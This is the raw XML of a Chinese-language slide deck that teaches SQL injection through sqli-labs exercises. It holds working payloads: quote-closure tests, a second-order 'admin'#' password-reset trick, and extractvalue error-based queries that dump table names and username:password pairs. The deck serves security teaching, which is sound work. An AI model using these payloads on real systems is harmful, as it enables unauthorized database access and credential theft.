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BC08E-2E61-4872-8387-408E3645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4C33F-0F37-460C-B48C-C63991593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CD974-60A4-4F9F-A031-F5D6AB4D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335EF-1EA1-4C07-8F84-27987354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9EBA-8713-413D-BF63-083DAAE1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0F7A-12B0-43A9-BF57-D0B2065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81646-40D7-487B-86D8-5F35D15A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CFF04-01F8-4469-8413-8FD26A9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AED-7CEA-47A2-8ADA-5C6B0165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638CE-2294-4F08-8007-08543839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8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576B9B-CEC5-4226-8A16-455F8FD5D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250D7-EDD5-4745-9D03-D3698AA2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C3A1E-C228-46E4-B834-2DE2CCD4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4ABFA-7A37-461B-AA7B-0A56C4A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C008E-906C-408D-BE08-F4DC401B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4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FF44-9C58-4258-B0A9-2431B629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D088-A6EB-4EF3-80D3-24D2EA63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9F678-C5BB-4122-9931-976BB86A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5ACC8-9C45-4C9A-8071-D48CED69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F4D4-AE26-4065-9032-29EB9A6A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5704C-C19C-4B7C-9AA7-DB668D77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0788C-2A8C-4CAB-99CD-17A74EA6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5E59E-185A-4B6B-AA7B-F5204616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2B1D3-6256-46A3-9433-0910652B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0AC1E-4159-4A3E-99A0-6C86B569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2674-B7D8-4354-9033-3271AB4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D592-EAE1-43D3-BCCE-1544B2491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D4BE-3BFD-4FC7-81F8-F712EF075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571EB-04AF-4CAE-B791-9211657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EB81A-6104-4A94-97AB-D8A13D61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DA543-241E-40E0-90C1-262513B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9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B9FB-C09F-4EFD-AC58-805DDBE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5CFD8-820A-4A7E-8D18-51DF6FB1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F7E62-D694-48EF-8D5B-0115EEE1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2D091-CC5B-43B6-A161-9DDDD5A1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CE5E1C-77A8-4BEA-9ECC-9A9B3231B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CD6AC4-FA5D-4417-83B5-F4F8EF1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B3CAA3-62EA-4EC2-8EE2-6DF3CB8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D87C16-BDB2-4B0C-AF56-690491C6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006C7-5C3E-4739-A47F-53FC104A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4853D-5096-40F4-8648-16D77D25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B4A45-4E4B-4061-BFB3-D3AC6E77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2D666A-B393-41D1-AE17-E15EFC9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1F1EBC-2D2F-4207-A0EB-53CA89F8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AE00A-CBDA-4982-916A-83043D03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98391-EAF6-40D2-88DD-42F3CAD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6AB09-584C-4C42-A00C-CA3F6E71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754A9-8B4B-437B-954D-4D98A60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AE7EC-1C29-4E8A-A349-78592D8E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588A7E-63C0-4075-AF6A-5D2BBCF4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D8228F-F94F-40E2-871F-67AA2F6F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F098D-E0AC-43C3-8555-A84143F6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9324D-8773-46F4-A75B-C5DBC954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FC74F-85AC-44C7-A470-77A2D93F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FDA5-A48F-48BC-92A7-4194A487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FB254-6EBF-4B53-99DD-F0E13FB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32D32-905E-43B1-9591-36309DF7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E03F-25C4-4966-90CD-DCFAC4DE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E67848-4E36-41A9-8419-D36C6BFE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7B7FC-A50D-407C-82B0-24DC464D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71DC7-C301-4A94-B832-7703DACFE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AD20-8F36-4314-86EB-AC95F301230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54C77-4A16-4419-92DA-E12F73E5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58CA2-228D-42B2-A41D-999AEB57E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EF874-D59D-4942-A15A-E09F40B997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AD9502-B231-49E5-AF8A-000BD703C591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1444689" y="998375"/>
            <a:ext cx="930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通过把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令插入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表单提交或输入域名或页面请求的查询字符串，最终达到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器执行恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令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6550-2DED-4C5D-A2B3-1BE0FD071A8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245706" y="125075"/>
            <a:ext cx="40308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-25000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" baseline="-25000" dirty="0"/>
              <a:t>注入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BB36D-C4F8-4C96-9106-C05BEDEE698E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196370" y="3429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判断闭合方式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67A655-92C1-44F1-A98C-2056BE4D049C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047999" y="2518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?id=1 and 1=1	页面显示正常</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>?id=1 and 1=2	页面显示就变了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2F1C4-C5DD-4291-A819-DB84F969023F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="2691395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27D8FF-2980-4E4F-9C29-A4FB877C1893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3067222" y="3629055"/>
            <a:ext cx="4950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常见的闭合方式有成对的**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>' '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、（ ）**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>less-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?id=1	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面正常</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?id=1'	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面发生变化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?id=1' or '1'='1'--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?id=1' --+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面正常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86C4D6-B0CC-4073-A488-9288B10AB038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7770340" y="46159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字符型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296387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7DE1D2-D26D-4E29-82CF-D931FD61D017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257427" y="174562"/>
            <a:ext cx="1550424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aseline="-25000" dirty="0"/>
              <a:t>注入分类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51A8AA-A267-4D9C-9904-4606C632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27" y="2740481"/>
            <a:ext cx="14670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注入点分类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9352C8-62A8-42F0-AEBE-5AE16DBF74F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724495" y="20416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数字型注入点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484B2-5707-48D4-A3B1-F2C7488096A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724495" y="274048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字符型注入点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6F06F3-9A75-416F-9340-38631E7C7DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724495" y="34393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搜索型注入点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A92AD0-157A-4A58-B08B-E24F33F6E5E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643424" y="27628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数据提交方式分类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34F09A-066A-41D3-9B98-BD5B34C98A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674749" y="1856992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GET注入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34D42D-DEDF-4DE8-8DB3-9BE509607BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674749" y="2450661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POST注入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E6DF00-4E36-41F7-8761-05CAB0372BD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674749" y="298794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Cookie注入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1AB9AE-2111-4C0D-A04C-8420A4E4F00E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5685892" y="3541168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HTTP头部注入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B383A9-5735-40A6-B8BF-7244F673E106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7310133" y="27628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执行效果分类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DD1C59-B08B-4481-B915-F5D936DA859C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8879793" y="1856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布尔盲注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FBF12D-6745-4D97-9C19-32153D895ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8879793" y="24797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时间盲注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534B0C-C5AF-4343-90F0-B98EBC87B49B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8883584" y="30163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报错注入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DD7D19-B2A6-4B32-A0C6-002ADBDB9ECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8879793" y="36945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联合注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22566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BCC244-A531-4EF0-B8EB-C196D6067A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023257" y="1948266"/>
            <a:ext cx="10145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MySQL注入中要使用到的关键系统表和对应的关键字段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information_schema.SCHEMATA SCHEMA_NAME // MySQL的全部数据库名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information_schema.TABLES TABLE_NAME // MySQL的全部数据表名 TABLE_SCHEMA // 数据表所属的数据库名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information_schema.COLUMNS COLUMN_NAME // MySQL的全部字段名 TABLE_NAME // 字段所属的数据表名 TABLE_SCHEMA // 字段所属的数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157443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FEC9EB-492B-48DB-B344-1A00235F76C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023257" y="377601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一般而言修改密码的SQL语句为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>update users set password='$pass' where username='$username' and password='$curr_pass'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但是我们注册的admin'#让它成为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>update users set password='$pass' where username='admin'#' and password='$curr_pass'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其等效于：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>update users set password='$pass' where username='admin'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所以实现了修改密码的操作。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7AEE4F-680E-4008-9087-CC24B3513DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373224" y="485192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二次注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以简化版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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EA5A5D-5466-4F75-8588-7DC11227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03" y="971219"/>
            <a:ext cx="2814735" cy="26881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5E9CB2-0FFD-49B3-9511-DBE46B0BE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9" y="987600"/>
            <a:ext cx="2655338" cy="26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A8B3F-1647-45FF-BB28-BAF9BDD0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12" y="1051183"/>
            <a:ext cx="10515600" cy="5209657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>爆库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database()))) #&amp;passwd=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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>##XPATH syntax error: '~security'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爆表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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>group_concat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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>=database())))#&amp;passwd=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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>##XPATH syntax error: '~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>emails,referers,uagents,users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>##</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>只能查询到前几个表，后面加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>not in ()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>就可以查到其他表了，如：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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>group_concat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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>=database() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> not in ('emails')))) #&amp;passwd=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爆列名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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>='users'))) #&amp;passwd=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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>##</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>机械操作对其他的进行处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>爆值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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(username,0x3a,password) from users)))#&amp;passwd=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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>##</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>同样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>not in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>查其他值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>=admin' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(1,concat(0x7e,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(username,0x3a,password) from users)))--+&amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>admin&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>=Submit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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EB8F90-6B31-4030-A387-1A9235335D2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363894" y="422182"/>
            <a:ext cx="27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报错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr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7944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590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2020-07-12T12:17:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-12T12:36:47Z</dcterms:modified>
</cp:coreProperties>
</file>